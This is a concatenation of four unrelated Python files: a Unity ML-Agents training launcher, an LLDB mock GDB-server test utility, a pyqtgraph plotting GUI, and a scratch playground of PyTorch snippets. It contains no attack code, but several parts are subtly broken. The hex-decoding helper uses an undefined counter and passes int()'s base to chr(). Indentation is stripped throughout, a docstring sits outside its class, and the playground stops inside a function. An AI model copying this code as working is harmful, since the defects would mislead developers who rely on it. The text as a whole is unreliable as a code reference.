learn.py
# # Unity ML-Agents Toolkit
import logging
from multiprocessing import Process, Queue
import os
import glob
import shutil
import numpy as np
import yaml
from docopt import docopt
from typing import Any, Callable, Dict, Optional
from mlagents.trainers.trainer_controller import TrainerController
from mlagents.trainers.exception import TrainerError
from mlagents.trainers import MetaCurriculumError, MetaCurriculum
from mlagents.envs import UnityEnvironment
from mlagents.envs.sampler_class import SamplerManager
from mlagents.envs.exception import UnityEnvironmentException, SamplerException
from mlagents.envs.base_unity_environment import BaseUnityEnvironment
from mlagents.envs.subprocess_env_manager import SubprocessEnvManager
def run_training(
sub_id: int, run_seed: int, run_options: Dict[str, Any], process_queue: Queue
) -> None:
"""
Launches training session.
:param process_queue: Queue used to send signal back to main.
:param sub_id: Unique id for training session.
:param run_seed: Random seed used for training.
:param run_options: Command line arguments for training.
"""
# Docker Parameters
docker_target_name = (
run_options["--docker-target-name"]
if run_options["--docker-target-name"] != "None"
else None
)
# General parameters
env_path = run_options["--env"] if run_options["--env"] != "None" else None
run_id = run_options["--run-id"]
load_model = run_options["--load"]
train_model = run_options["--train"]
save_freq = int(run_options["--save-freq"])
keep_checkpoints = int(run_options["--keep-checkpoints"])
base_port = int(run_options["--base-port"])
num_envs = int(run_options["--num-envs"])
curriculum_folder = (
run_options["--curriculum"] if run_options["--curriculum"] != "None" else None
)
lesson = int(run_options["--lesson"])
fast_simulation = not bool(run_options["--slow"])
no_graphics = run_options["--no-graphics"]
trainer_config_path = run_options["<trainer-config-path>"]
sampler_file_path = (
run_options["--sampler"] if run_options["--sampler"] != "None" else None
)
# Recognize and use docker volume if one is passed as an argument
if not docker_target_name:
model_path = "./models/{run_id}-{sub_id}".format(run_id=run_id, sub_id=sub_id)
summaries_dir = "./summaries"
else:
trainer_config_path = "/{docker_target_name}/{trainer_config_path}".format(
docker_target_name=docker_target_name,
trainer_config_path=trainer_config_path,
)
if curriculum_folder is not None:
curriculum_folder = "/{docker_target_name}/{curriculum_folder}".format(
docker_target_name=docker_target_name,
curriculum_folder=curriculum_folder,
)
model_path = "/{docker_target_name}/models/{run_id}-{sub_id}".format(
docker_target_name=docker_target_name, run_id=run_id, sub_id=sub_id
)
summaries_dir = "/{docker_target_name}/summaries".format(
docker_target_name=docker_target_name
)
trainer_config = load_config(trainer_config_path)
env_factory = create_environment_factory(
env_path,
docker_target_name,
no_graphics,
run_seed,
base_port + (sub_id * num_envs),
)
env = SubprocessEnvManager(env_factory, num_envs)
maybe_meta_curriculum = try_create_meta_curriculum(curriculum_folder, env)
sampler_manager, resampling_interval = create_sampler_manager(
sampler_file_path, env.reset_parameters, run_seed
)
# Create controller and begin training.
tc = TrainerController(
model_path,
summaries_dir,
run_id + "-" + str(sub_id),
save_freq,
maybe_meta_curriculum,
load_model,
train_model,
keep_checkpoints,
lesson,
run_seed,
fast_simulation,
sampler_manager,
resampling_interval,
)
# Signal that environment has been launched.
process_queue.put(True)
# Begin training
tc.start_learning(env, trainer_config)
def create_sampler_manager(sampler_file_path, env_reset_params, run_seed=None):
sampler_config = None
resample_interval = None
if sampler_file_path is not None:
sampler_config = load_config(sampler_file_path)
if ("resampling-interval") in sampler_config:
# Filter arguments that do not exist in the environment
resample_interval = sampler_config.pop("resampling-interval")
if (resample_interval <= 0) or (not isinstance(resample_interval, int)):
raise SamplerException(
"Specified resampling-interval is not valid. Please provide"
" a positive integer value for resampling-interval"
)
else:
raise SamplerException(
"Resampling interval was not specified in the sampler file."
" Please specify it with the 'resampling-interval' key in the sampler config file."
)
sampler_manager = SamplerManager(sampler_config, run_seed)
return sampler_manager, resample_interval
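# A sampler file is plain YAML. A sketch of the expected shape (the parameter
# names below are illustrative assumptions; only 'resampling-interval' is read here):
#   resampling-interval: 5000
#   mass:
#       sampler-type: uniform
#       min_value: 0.5
#       max_value: 10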
def try_create_meta_curriculum(
curriculum_folder: Optional[str], env: SubprocessEnvManager
) -> Optional[MetaCurriculum]:
if curriculum_folder is None:
return None
else:
meta_curriculum = MetaCurriculum(curriculum_folder, env.reset_parameters)
if meta_curriculum:
for brain_name in meta_curriculum.brains_to_curriculums.keys():
if brain_name not in env.external_brains.keys():
raise MetaCurriculumError(
"One of the curricula "
"defined in " + curriculum_folder + " "
"does not have a corresponding "
"Brain. Check that the "
"curriculum file has the same "
"name as the Brain "
"whose curriculum it defines."
)
return meta_curriculum
def prepare_for_docker_run(docker_target_name, env_path):
for f in glob.glob(
"/{docker_target_name}/*".format(docker_target_name=docker_target_name)
):
if env_path in f:
try:
b = os.path.basename(f)
if os.path.isdir(f):
shutil.copytree(f, "/ml-agents/{b}".format(b=b))
else:
src_f = "/{docker_target_name}/{b}".format(
docker_target_name=docker_target_name, b=b
)
dst_f = "/ml-agents/{b}".format(b=b)
shutil.copyfile(src_f, dst_f)
os.chmod(dst_f, 0o775) # Make executable
except Exception as e:
logging.getLogger("mlagents.trainers").info(e)
env_path = "/ml-agents/{env_path}".format(env_path=env_path)
return env_path
def load_config(trainer_config_path: str) -> Dict[str, Any]:
try:
with open(trainer_config_path) as data_file:
trainer_config = yaml.safe_load(data_file)
return trainer_config
except IOError:
raise UnityEnvironmentException(
"Parameter file could not be found " "at {}.".format(trainer_config_path)
)
except UnicodeDecodeError:
raise UnityEnvironmentException(
"There was an error decoding "
"Trainer Config from this path : {}".format(trainer_config_path)
)
def create_environment_factory(
env_path: str,
docker_target_name: str,
no_graphics: bool,
seed: Optional[int],
start_port: int,
) -> Callable[[int], BaseUnityEnvironment]:
if env_path is not None:
# Strip out executable extensions if passed
env_path = (
env_path.strip()
.replace(".app", "")
.replace(".exe", "")
.replace(".x86_64", "")
.replace(".x86", "")
)
docker_training = docker_target_name is not None
if docker_training and env_path is not None:
"""
Comments for future maintenance:
Some OS/VM instances (e.g. COS GCP Image) mount filesystems
with COS flag which prevents execution of the Unity scene,
to get around this, we will copy the executable into the
container.
"""
# Navigate in docker path and find env_path and copy it.
env_path = prepare_for_docker_run(docker_target_name, env_path)
seed_count = 10000
seed_pool = [np.random.randint(0, seed_count) for _ in range(seed_count)]
def create_unity_environment(worker_id: int) -> UnityEnvironment:
env_seed = seed
if not env_seed:
env_seed = seed_pool[worker_id % len(seed_pool)]
return UnityEnvironment(
file_name=env_path,
worker_id=worker_id,
seed=env_seed,
docker_training=docker_training,
no_graphics=no_graphics,
base_port=start_port,
)
return create_unity_environment
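# (Sketch) Each subprocess worker calls the returned factory with its own
# worker_id to create an independent UnityEnvironment, e.g. env_factory(0).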
def main():
try:
print(
"""
▄▄▄▓▓▓▓
╓▓▓▓▓▓▓█▓▓▓▓▓
,▄▄▄m▀▀▀' ,▓▓▓▀▓▓▄ ▓▓▓ ▓▓▌
▄▓▓▓▀' ▄▓▓▀ ▓▓▓ ▄▄ ▄▄ ,▄▄ ▄▄▄▄ ,▄▄ ▄▓▓▌▄ ▄▄▄ ,▄▄
▄▓▓▓▀ ▄▓▓▀ ▐▓▓▌ ▓▓▌ ▐▓▓ ▐▓▓▓▀▀▀▓▓▌ ▓▓▓ ▀▓▓▌▀ ^▓▓▌ ╒▓▓▌
▄▓▓▓▓▓▄▄▄▄▄▄▄▄▓▓▓ ▓▀ ▓▓▌ ▐▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▌ ▐▓▓▄ ▓▓▌
▀▓▓▓▓▀▀▀▀▀▀▀▀▀▀▓▓▄ ▓▓ ▓▓▌ ▐▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▌ ▐▓▓▐▓▓
^█▓▓▓ ▀▓▓▄ ▐▓▓▌ ▓▓▓▓▄▓▓▓▓ ▐▓▓ ▓▓▓ ▓▓▓ ▓▓▓▄ ▓▓▓▓`
'▀▓▓▓▄ ^▓▓▓ ▓▓▓ └▀▀▀▀ ▀▀ ^▀▀ `▀▀ `▀▀ '▀▀ ▐▓▓▌
▀▀▀▀▓▄▄▄ ▓▓▓▓▓▓, ▓▓▓▓▀
`▀█▓▓▓▓▓▓▓▓▓▌
¬`▀▀▀█▓
"""
)
except Exception:
print("\n\n\tUnity Technologies\n")
_USAGE = """
Usage:
mlagents-learn <trainer-config-path> [options]
mlagents-learn --help
Options:
--env=<file> Name of the Unity executable [default: None].
--curriculum=<directory> Curriculum json directory for environment [default: None].
--sampler=<file> Reset parameter yaml file for environment [default: None].
--keep-checkpoints=<n> How many model checkpoints to keep [default: 5].
--lesson=<n> Start learning from this lesson [default: 0].
--load Whether to load the model or randomly initialize [default: False].
--run-id=<path> The directory name for model and summary statistics [default: ppo].
--num-runs=<n> Number of concurrent training sessions [default: 1].
--save-freq=<n> Frequency at which to save model [default: 50000].
--seed=<n> Random seed used for training [default: -1].
--slow Whether to run the game at training speed [default: False].
--train Whether to train model, or only run inference [default: False].
--base-port=<n> Base port for environment communication [default: 5005].
--num-envs=<n> Number of parallel environments to use for training [default: 1]
--docker-target-name=<dt> Docker volume to store training-specific files [default: None].
--no-graphics Whether to run the environment in no-graphics mode [default: False].
--debug Whether to run ML-Agents in debug mode with detailed logging [default: False].
"""
options = docopt(_USAGE)
trainer_logger = logging.getLogger("mlagents.trainers")
env_logger = logging.getLogger("mlagents.envs")
trainer_logger.info(options)
if options["--debug"]:
trainer_logger.setLevel("DEBUG")
env_logger.setLevel("DEBUG")
num_runs = int(options["--num-runs"])
seed = int(options["--seed"])
if options["--env"] == "None" and num_runs > 1:
raise TrainerError(
"It is not possible to launch more than one concurrent training session "
"when training from the editor."
)
jobs = []
run_seed = seed
if num_runs == 1:
if seed == -1:
run_seed = np.random.randint(0, 10000)
run_training(0, run_seed, options, Queue())
else:
for i in range(num_runs):
if seed == -1:
run_seed = np.random.randint(0, 10000)
process_queue = Queue()
p = Process(target=run_training, args=(i, run_seed, options, process_queue))
jobs.append(p)
p.start()
# Wait for signal that environment has successfully launched
while process_queue.get() is not True:
continue
# Wait for jobs to complete. Otherwise we'll have an extra
# unhandled KeyboardInterrupt if we end early.
try:
for job in jobs:
job.join()
except KeyboardInterrupt:
pass
# For python debugger to directly run this script
if __name__ == "__main__":
main()
gdbclientutils.py
import ctypes
import errno
import io
import threading
import socket
import traceback
from lldbsuite.support import seven
def checksum(message):
"""
Calculate the GDB server protocol checksum of the message.
The GDB server protocol uses a simple modulo 256 sum.
"""
check = 0
for c in message:
check += ord(c)
return check % 256
def frame_packet(message):
"""
Create a framed packet that's ready to send over the GDB connection
channel.
Framing includes surrounding the message between $ and #, and appending
a two character hex checksum.
"""
return "$%s#%02x" % (message, checksum(message))
def escape_binary(message):
"""
Escape the binary message using the process described in the GDB server
protocol documentation.
    Most bytes are sent through as-is, but $, #, and } are escaped by writing
    a } followed by the original byte XOR'd with 0x20.
"""
out = ""
for c in message:
d = ord(c)
if d in (0x23, 0x24, 0x7d):
out += chr(0x7d)
out += chr(d ^ 0x20)
else:
out += c
return out
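# For example (a sketch): escape_binary("$") == "}" + chr(0x04), because
# 0x24 ^ 0x20 == 0x04; a receiver undoes this by XOR'ing the byte after '}' with 0x20.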
def hex_encode_bytes(message):
"""
Encode the binary message by converting each byte into a two-character
hex string.
"""
out = ""
for c in message:
out += "%02x" % ord(c)
return out
def hex_decode_bytes(hex_bytes):
"""
Decode the hex string into a binary message by converting each two-character
hex string into a single output byte.
"""
out = ""
hex_len = len(hex_bytes)
while i < hex_len - 1:
out += chr(int(hex_bytes[i:i + 2]), 16)
i += 2
return out
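# For example (a sketch): hex_encode_bytes("OK") == "4f4b" and
# hex_decode_bytes("4f4b") == "OK".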
class MockGDBServerResponder:
"""
A base class for handling client packets and issuing server responses for
GDB tests.
This handles many typical situations, while still allowing subclasses to
completely customize their responses.
Most subclasses will be interested in overriding the other() method, which
handles any packet not recognized in the common packet handling code.
"""
registerCount = 40
packetLog = None
class RESPONSE_DISCONNECT: pass
def __init__(self):
self.packetLog = []
def respond(self, packet):
"""
Return the unframed packet data that the server should issue in response
to the given packet received from the client.
"""
self.packetLog.append(packet)
if packet is MockGDBServer.PACKET_INTERRUPT:
return self.interrupt()
if packet == "c":
return self.cont()
if packet.startswith("vCont;c"):
return self.vCont(packet)
if packet[0] == "A":
return self.A(packet)
if packet[0] == "D":
return self.D(packet)
if packet[0] == "g":
return self.readRegisters()
if packet[0] == "G":
# Gxxxxxxxxxxx
# Gxxxxxxxxxxx;thread:1234;
return self.writeRegisters(packet[1:].split(';')[0])
if packet[0] == "p":
regnum = packet[1:].split(';')[0]
return self.readRegister(int(regnum, 16))
if packet[0] == "P":
register, value = packet[1:].split("=")
return self.writeRegister(int(register, 16), value)
if packet[0] == "m":
addr, length = [int(x, 16) for x in packet[1:].split(',')]
return self.readMemory(addr, length)
if packet[0] == "M":
location, encoded_data = packet[1:].split(":")
addr, length = [int(x, 16) for x in location.split(',')]
return self.writeMemory(addr, encoded_data)
if packet[0:7] == "qSymbol":
return self.qSymbol(packet[8:])
if packet[0:10] == "qSupported":
return self.qSupported(packet[11:].split(";"))
if packet == "qfThreadInfo":
return self.qfThreadInfo()
if packet == "qsThreadInfo":
return self.qsThreadInfo()
if packet == "qC":
return self.qC()
if packet == "QEnableErrorStrings":
return self.QEnableErrorStrings()
if packet == "?":
return self.haltReason()
if packet == "s":
return self.haltReason()
if packet[0] == "H":
tid = packet[2:]
if "." in tid:
assert tid.startswith("p")
# TODO: do we want to do anything with PID?
tid = tid.split(".", 1)[1]
return self.selectThread(packet[1], int(tid, 16))
if packet[0:6] == "qXfer:":
obj, read, annex, location = packet[6:].split(":")
offset, length = [int(x, 16) for x in location.split(',')]
data, has_more = self.qXferRead(obj, annex, offset, length)
if data is not None:
return self._qXferResponse(data, has_more)
return ""
if packet.startswith("vAttach;"):
pid = packet.partition(';')[2]
return self.vAttach(int(pid, 16))
if packet[0] == "Z":
return self.setBreakpoint(packet)
if packet.startswith("qThreadStopInfo"):
            threadnum = int(packet[15:], 16)
return self.threadStopInfo(threadnum)
if packet == "QThreadSuffixSupported":
return self.QThreadSuffixSupported()
if packet == "QListThreadsInStopReply":
return self.QListThreadsInStopReply()
if packet.startswith("qMemoryRegionInfo:"):
return self.qMemoryRegionInfo(int(packet.split(':')[1], 16))
if packet == "qQueryGDBServer":
return self.qQueryGDBServer()
if packet == "qHostInfo":
return self.qHostInfo()
if packet == "qGetWorkingDir":
return self.qGetWorkingDir()
if packet == "qOffsets":
            return self.qOffsets()
if packet == "qsProcessInfo":
return self.qsProcessInfo()
if packet.startswith("qfProcessInfo"):
return self.qfProcessInfo(packet)
if packet.startswith("qPathComplete:"):
return self.qPathComplete()
if packet.startswith("vFile:"):
return self.vFile(packet)
if packet.startswith("vRun;"):
return self.vRun(packet)
if packet.startswith("qLaunchSuccess"):
return self.qLaunchSuccess()
if packet.startswith("QEnvironment:"):
return self.QEnvironment(packet)
if packet.startswith("QEnvironmentHexEncoded:"):
return self.QEnvironmentHexEncoded(packet)
if packet.startswith("qRegisterInfo"):
regnum = int(packet[len("qRegisterInfo"):], 16)
return self.qRegisterInfo(regnum)
if packet == "k":
return self.k()
return self.other(packet)
def qsProcessInfo(self):
return "E04"
def qfProcessInfo(self, packet):
return "E04"
def qGetWorkingDir(self):
return "2f"
def qOffsets(self):
return ""
def qHostInfo(self):
return "ptrsize:8;endian:little;"
def qQueryGDBServer(self):
return "E04"
def interrupt(self):
raise self.UnexpectedPacketException()
def cont(self):
raise self.UnexpectedPacketException()
def vCont(self, packet):
raise self.UnexpectedPacketException()
def A(self, packet):
return ""
def D(self, packet):
return "OK"
def readRegisters(self):
return "00000000" * self.registerCount
def readRegister(self, register):
return "00000000"
def writeRegisters(self, registers_hex):
return "OK"
def writeRegister(self, register, value_hex):
return "OK"
def readMemory(self, addr, length):
return "00" * length
def writeMemory(self, addr, data_hex):
return "OK"
def qSymbol(self, symbol_args):
return "OK"
def qSupported(self, client_supported):
return "qXfer:features:read+;PacketSize=3fff;QStartNoAckMode+"
def qfThreadInfo(self):
return "l"
def qsThreadInfo(self):
return "l"
def qC(self):
return "QC0"
def QEnableErrorStrings(self):
return "OK"
def haltReason(self):
# SIGINT is 2, return type is 2 digit hex string
return "S02"
def qXferRead(self, obj, annex, offset, length):
return None, False
def _qXferResponse(self, data, has_more):
return "%s%s" % ("m" if has_more else "l", escape_binary(data))
def vAttach(self, pid):
raise self.UnexpectedPacketException()
def selectThread(self, op, thread_id):
return "OK"
def setBreakpoint(self, packet):
raise self.UnexpectedPacketException()
def threadStopInfo(self, threadnum):
return ""
def other(self, packet):
# empty string means unsupported
return ""
def QThreadSuffixSupported(self):
return ""
def QListThreadsInStopReply(self):
return ""
def qMemoryRegionInfo(self, addr):
return ""
def qPathComplete(self):
return ""
def vFile(self, packet):
return ""
def vRun(self, packet):
return ""
def qLaunchSuccess(self):
return ""
def QEnvironment(self, packet):
return "OK"
def QEnvironmentHexEncoded(self, packet):
return "OK"
def qRegisterInfo(self, num):
return ""
def k(self):
return ["W01", self.RESPONSE_DISCONNECT]
"""
Raised when we receive a packet for which there is no default action.
Override the responder class to implement behavior suitable for the test at
hand.
"""
class UnexpectedPacketException(Exception):
pass
class ServerSocket:
"""
A wrapper class for TCP or pty-based server.
"""
def get_connect_address(self):
"""Get address for the client to connect to."""
def get_connect_url(self):
"""Get URL suitable for process connect command."""
def close_server(self):
"""Close all resources used by the server."""
def accept(self):
"""Accept a single client connection to the server."""
def close_connection(self):
"""Close all resources used by the accepted connection."""
def recv(self):
"""Receive a data packet from the connected client."""
def sendall(self, data):
"""Send the data to the connected client."""
class TCPServerSocket(ServerSocket):
def __init__(self):
family, type, proto, _, addr = socket.getaddrinfo(
"localhost", 0, proto=socket.IPPROTO_TCP)[0]
self._server_socket = socket.socket(family, type, proto)
self._connection = None
self._server_socket.bind(addr)
self._server_socket.listen(1)
def get_connect_address(self):
return "[{}]:{}".format(*self._server_socket.getsockname())
def get_connect_url(self):
return "connect://" + self.get_connect_address()
def close_server(self):
self._server_socket.close()
def accept(self):
assert self._connection is None
# accept() is stubborn and won't fail even when the socket is
# shutdown, so we'll use a timeout
self._server_socket.settimeout(30.0)
client, client_addr = self._server_socket.accept()
        # The connected client inherits its timeout from self._server_socket,
        # but we'll use a blocking socket for the client
client.settimeout(None)
self._connection = client
def close_connection(self):
assert self._connection is not None
self._connection.close()
self._connection = None
def recv(self):
assert self._connection is not None
return self._connection.recv(4096)
def sendall(self, data):
assert self._connection is not None
return self._connection.sendall(data)
class PtyServerSocket(ServerSocket):
def __init__(self):
import pty
import tty
primary, secondary = pty.openpty()
tty.setraw(primary)
self._primary = io.FileIO(primary, 'r+b')
self._secondary = io.FileIO(secondary, 'r+b')
def get_connect_address(self):
libc = ctypes.CDLL(None)
libc.ptsname.argtypes = (ctypes.c_int,)
libc.ptsname.restype = ctypes.c_char_p
return libc.ptsname(self._primary.fileno()).decode()
def get_connect_url(self):
return "serial://" + self.get_connect_address()
def close_server(self):
self._secondary.close()
self._primary.close()
def recv(self):
try:
return self._primary.read(4096)
except OSError as e:
# closing the pty results in EIO on Linux, convert it to EOF
if e.errno == errno.EIO:
return b''
raise
def sendall(self, data):
return self._primary.write(data)
class MockGDBServer:
"""
A simple TCP-based GDB server that can test client behavior by receiving
commands and issuing custom-tailored responses.
Responses are generated via the .responder property, which should be an
instance of a class based on MockGDBServerResponder.
"""
responder = None
_socket = None
_thread = None
_receivedData = None
_receivedDataOffset = None
_shouldSendAck = True
def __init__(self, socket):
self._socket = socket
self.responder = MockGDBServerResponder()
def start(self):
# Start a thread that waits for a client connection.
self._thread = threading.Thread(target=self.run)
self._thread.start()
def stop(self):
self._thread.join()
self._thread = None
def get_connect_address(self):
return self._socket.get_connect_address()
def get_connect_url(self):
return self._socket.get_connect_url()
def run(self):
# For testing purposes, we only need to worry about one client
# connecting just one time.
try:
self._socket.accept()
except:
return
self._shouldSendAck = True
self._receivedData = ""
self._receivedDataOffset = 0
data = None
try:
while True:
data = seven.bitcast_to_string(self._socket.recv())
if data is None or len(data) == 0:
break
self._receive(data)
except self.TerminateConnectionException:
pass
except Exception as e:
print("An exception happened when receiving the response from the gdb server. Closing the client...")
traceback.print_exc()
finally:
self._socket.close_connection()
self._socket.close_server()
def _receive(self, data):
"""
Collects data, parses and responds to as many packets as exist.
Any leftover data is kept for parsing the next time around.
"""
self._receivedData += data
packet = self._parsePacket()
while packet is not None:
self._handlePacket(packet)
packet = self._parsePacket()
def _parsePacket(self):
"""
Reads bytes from self._receivedData, returning:
- a packet's contents if a valid packet is found
- the PACKET_ACK unique object if we got an ack
- None if we only have a partial packet
Raises an InvalidPacketException if unexpected data is received
or if checksums fail.
Once a complete packet is found at the front of self._receivedData,
        its data is removed from self._receivedData.
"""
data = self._receivedData
i = self._receivedDataOffset
data_len = len(data)
if data_len == 0:
return None
if i == 0:
# If we're looking at the start of the received data, that means
# we're looking for the start of a new packet, denoted by a $.
# It's also possible we'll see an ACK here, denoted by a +
if data[0] == '+':
self._receivedData = data[1:]
return self.PACKET_ACK
if ord(data[0]) == 3:
self._receivedData = data[1:]
return self.PACKET_INTERRUPT
if data[0] == '$':
i += 1
else:
raise self.InvalidPacketException(
"Unexpected leading byte: %s" % data[0])
# If we're looking beyond the start of the received data, then we're
# looking for the end of the packet content, denoted by a #.
# Note that we pick up searching from where we left off last time
while i < data_len and data[i] != '#':
i += 1
# If there isn't enough data left for a checksum, just remember where
# we left off so we can pick up there the next time around
if i > data_len - 3:
self._receivedDataOffset = i
return None
# If we have enough data remaining for the checksum, extract it and
# compare to the packet contents
packet = data[1:i]
i += 1
try:
check = int(data[i:i + 2], 16)
except ValueError:
raise self.InvalidPacketException("Checksum is not valid hex")
i += 2
if check != checksum(packet):
raise self.InvalidPacketException(
"Checksum %02x does not match content %02x" %
(check, checksum(packet)))
# remove parsed bytes from _receivedData and reset offset so parsing
# can start on the next packet the next time around
self._receivedData = data[i:]
self._receivedDataOffset = 0
return packet
def _sendPacket(self, packet):
self._socket.sendall(seven.bitcast_to_bytes(frame_packet(packet)))
def _handlePacket(self, packet):
if packet is self.PACKET_ACK:
# Ignore ACKs from the client. For the future, we can consider
# adding validation code to make sure the client only sends ACKs
# when it's supposed to.
return
response = ""
# We'll handle the ack stuff here since it's not something any of the
# tests will be concerned about, and it'll get turned off quickly anyway.
if self._shouldSendAck:
self._socket.sendall(seven.bitcast_to_bytes('+'))
if packet == "QStartNoAckMode":
self._shouldSendAck = False
response = "OK"
elif self.responder is not None:
# Delegate everything else to our responder
response = self.responder.respond(packet)
if not isinstance(response, list):
response = [response]
for part in response:
if part is MockGDBServerResponder.RESPONSE_DISCONNECT:
raise self.TerminateConnectionException()
self._sendPacket(part)
PACKET_ACK = object()
PACKET_INTERRUPT = object()
class TerminateConnectionException(Exception):
pass
class InvalidPacketException(Exception):
pass
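# Typical wiring in a test (a sketch based on the classes above; the concrete
# responder subclass and the debugger-side connect step are assumptions):
#   server = MockGDBServer(TCPServerSocket())
#   server.responder = MyResponder()  # a MockGDBServerResponder subclass
#   server.start()
#   ...  # point the client at server.get_connect_url()
#   server.stop()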
gui_pyqtgraph.py
# -*- coding: utf-8 -*-
'''
GUI for quicktracer
'''
from pyqtgraph.Qt import QtGui, QtCore
import pyqtgraph as pg
import sys
import os
import threading
import json
import traceback
import importlib.util
from displays import default_display_classes
ANIMATION_UPDATE_INTERVAL = 10 # ms
# Globals
key_to_display = {}
# Protocol constants
KEY = 'k'
VALUE = 'v'
TIME = 't'
CUSTOM_DISPLAY = 'custom_display'
VIEW_BOX = 'view_box'
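# Each stdin line is a JSON object keyed by the constants above; a sketch with
# made-up values: {"k": "speed", "v": 3.2, "t": 0.016, "view_box": "car"}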
def read_input():
global key_to_display
try:
while True:
try:
line = input()
except EOFError as e:
return
message = json.loads(line)
key = message[KEY]
view_box = message.get(VIEW_BOX, None)
if key not in key_to_display:
plot = create_plot(message)
plot.set_view_box_id(view_box)
plot.set_title(view_box or key)
plot.add_value(message)
key_to_display[key] = plot
else:
key_to_display[key].add_value(message)
except Exception as e:
traceback.print_exc()
sys.stdout.flush()
sys.stderr.flush()
sys.exit(-1)
def create_plot(message):
global key_to_display
key = message[KEY]
value = message[VALUE]
custom_display = message.get(CUSTOM_DISPLAY, None)
if custom_display:
module_path, display_class_name = custom_display
sys.path.append(os.path.dirname(module_path))
spec = importlib.util.spec_from_file_location(display_class_name, module_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
display_class = getattr(module, display_class_name)
return display_class()
for display_class in default_display_classes:
if display_class.accepts_value(value):
display = display_class()
return display
raise Exception('unexpected datatype. key={} value={}: '.format(key, repr(value)))
class NonFocusStealingGraphicsWindow(pg.GraphicsWindow):
def show(self):
self.setAttribute(98) # Qt::WA_ShowWithoutActivating
super().show()
def main():
app = QtGui.QApplication([])
win = NonFocusStealingGraphicsWindow(title='quicktracer')
win.setGeometry(0, 30, 600, 600)
threading.Thread(target=read_input, daemon=True).start()
def update():
global key_to_display
try:
for key in sorted(key_to_display):
key_to_display[key].render_with_init(win)
except Exception as e:
traceback.print_exc()
sys.stdout.flush()
sys.stderr.flush()
timer = QtCore.QTimer()
timer.timeout.connect(update)
    timer.start(ANIMATION_UPDATE_INTERVAL)
if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):
QtGui.QApplication.instance().exec_()
if __name__ == '__main__':
main()
python_pg.py
# %%
# to test imports
import sys
from typing import List, NewType, Any
for path in sys.path:
print(path)
# %%
import torch
def __path_bn_layer_for_functional_eval(self, module, input):
    for attr_str in dir(module):
        target_attr = getattr(module, attr_str)
        print(target_attr)
        if type(target_attr) == torch.nn.BatchNorm1d:
            target_attr.track_running_stats = True
            target_attr.running_mean = input.mean()
            target_attr.running_var = input.var()
            target_attr.num_batches_tracked = torch.tensor(0, dtype=torch.long)
    # "recurse": iterate through immediate child modules. Note, the recursion is done by our code, no need to use named_modules()
    for name, immediate_child_module in module.named_children():
        self.__path_bn_layer_for_functional_eval(immediate_child_module, input)
# %%
import time
import logging
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter('%(levelname)s:%(name)s:%(message)s')
file_handler = logging.FileHandler('employee.log')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
class Employee:
"""A sample Employee class"""
def __init__(self, first, last):
self.first = first
self.last = last
logger.info('Created Employee: {} - {}'.format(self.fullname, self.email))
@property
def email(self):
return '{}.{}@email.com'.format(self.first, self.last)
@property
def fullname(self):
return '{} {}'.format(self.first, self.last)
emp_1 = Employee('John', 'Smith')
emp_2 = Employee('Corey', 'Schafer')
emp_3 = Employee('Jane', 'Doe')
######## END OF EMPLOYEE LOGGING EXAMPLE
def report_times(start, verbose=False):
'''
How much time has passed since the time "start"
:param float start: the number representing start (usually time.time())
'''
meta_str = ''
## REPORT TIMES
start_time = start
seconds = (time.time() - start_time)
minutes = seconds / 60
hours = minutes / 60
if verbose:
print(f"--- {seconds} {'seconds ' + meta_str} ---")
print(f"--- {minutes} {'minutes ' + meta_str} ---")
print(f"--- {hours} {'hours ' + meta_str} ---")
print('\a')
##
msg = f'time passed: hours:{hours}, minutes={minutes}, seconds={seconds}'
return msg, seconds, minutes, hours
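# Example usage (a sketch):
#   start = time.time()
#   ...  # do some work
#   msg, seconds, minutes, hours = report_times(start, verbose=True)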
#
# def params_in_comp_graph():
# import torch
# import torch.nn as nn
# # from torchviz import make_dot
# fc0 = nn.Linear(in_features=3, out_features=1)
# params = [('fc0', fc0)]
# mdl = nn.Sequential(OrderedDict(params))
#
# x = torch.randn(1, 3)
# # x.requires_grad = True # uncomment to put in computation graph
# y = torch.randn(1)
#
# l = (mdl(x) - y) ** 2
#
# # make_dot(l, params=dict(mdl.named_parameters()))
# params = dict(mdl.named_parameters())
# # params = {**params, 'x':x}
# make_dot(l, params=params).render('data/debug/test_img_l', format='png')
def check_if_tensor_is_detached():
    import torch
    a = torch.tensor([2.0], requires_grad=True)
b = a.detach()
b.requires_grad = True
print(a == b)
print(a is b)
print(a)
print(b)
la = (5.0 - a) ** 2
la.backward()
print(f'a.grad = {a.grad}')
lb = (6.0 - b) ** 2
lb.backward()
print(f'b.grad = {b.grad}')
def deep_copy_issue():
    import copy
    import torch.nn as nn
    from collections import OrderedDict
    params = OrderedDict([('fc1', nn.Linear(in_features=3, out_features=1))])
mdl0 = nn.Sequential(params)
mdl1 = copy.deepcopy(mdl0)
print(id(mdl0))
print(mdl0)
print(id(mdl1))
print(mdl1)
# my update
mdl1.fc1.weight = nn.Parameter(mdl1.fc1.weight + 1)
mdl2 = copy.deepcopy(mdl1)
print(id(mdl2))
print(mdl2)
def download_mini_imagenet():
# download mini-imagenet automatically
import torch
import torch.nn as nn
import torchvision.datasets.utils as utils
from torchvision.datasets.utils import download_and_extract_archive
from torchvision.datasets.utils import download_file_from_google_drive
## download mini-imagenet
# url = 'https://drive.google.com/file/d/1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
file_id = '1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
filename = 'miniImagenet.tgz'
root = '~/tmp/' # dir to place downloaded file in
download_file_from_google_drive(file_id, root, filename)
def extract():
    import os
    from torchvision.datasets.utils import extract_archive
    from_path = os.path.expanduser('~/Downloads/miniImagenet.tgz')
extract_archive(from_path)
def download_and_extract_miniImagenet(root):
import os
from torchvision.datasets.utils import download_file_from_google_drive, extract_archive
## download miniImagenet
# url = 'https://drive.google.com/file/d/1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
file_id = '1rV3aj_hgfNTfCakffpPm7Vhpr1in87CR'
filename = 'miniImagenet.tgz'
download_file_from_google_drive(file_id, root, filename)
fpath = os.path.join(root, filename) # this is what download_file_from_google_drive does
## extract downloaded dataset
from_path = os.path.expanduser(fpath)
extract_archive(from_path)
## remove the zip file
os.remove(from_path)
def torch_concat():
    import torch
